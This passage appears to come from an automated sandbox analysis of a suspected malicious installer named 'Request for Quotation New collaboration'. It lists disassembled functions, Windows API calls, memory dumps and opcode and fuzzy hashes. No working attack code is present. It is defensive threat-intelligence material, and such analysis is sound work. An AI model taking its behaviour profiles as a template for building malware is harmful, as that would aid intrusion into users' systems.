                                                                                                                                  • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                  • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                                  • GetMessagePos.USER32 ref: 00404A81
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                  • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                  • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                                  • wsprintfW.USER32 ref: 00402CD1
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                                                  • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                  • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                                  • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                  • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                                                                  • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3579998418-0
                                                                                                                                  • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                  • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                                                  • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                                                  • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                    • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001928
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeGlobal$lstrcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 176019282-0
                                                                                                                                  • Opcode ID: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                  • Instruction ID: 5f977143e903dceeb219282147683d12af406f102b63ffa8563e92424d473d54
                                                                                                                                  • Opcode Fuzzy Hash: 1c9453be25982cee2ee6e6730667b579ec96db4d4f6aa0d6ab14657c31cbc0ef
                                                                                                                                  • Instruction Fuzzy Hash: B451B736F01119DAFF10DFA488815EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B9B
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                  • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                  • Instruction ID: ada95b61e8ad34ac3bb2ad29be3e5f3f7733698153a8948b25f67961a2a4c07b
                                                                                                                                  • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                                                                                                  • Instruction Fuzzy Hash: 2E113D7190400CFEEF21AF90DE89DAE3B79EB54348F10447AFA05B10A0D3759E51EA69
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                                                                                                  • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2037060970.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2037043192.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037076720.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2037093643.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1148316912-0
                                                                                                                                  • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                  • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                                                  • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                                                  • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                                                  • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                                                                                  • Opcode Fuzzy Hash: 489282a1a85ab549aaf4814a5337f0dda84e369b99e1904d90d03a31c2257fb7
                                                                                                                                  • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401D44
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                                                  • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                  • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                                  • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                                                                                  • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                                                                                  • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                                                                                  • wsprintfW.USER32 ref: 00404A12
                                                                                                                                  • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                  • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                  • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                                                                                  • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                                                                                  • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                  • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                                                                                  • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                                                                                  • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405DE1
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E02
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E25
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: Call
                                                                                                                                  • API String ID: 3677997916-1824292864
                                                                                                                                  • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                                  • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                                                                                  • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                                                  • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 0040593B
                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403512), ref: 00405945
                                                                                                                                  • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2030701040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2030684017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030718001.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030732887.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2030814980.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 2659869361-297319885
                                                                                                                                  • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
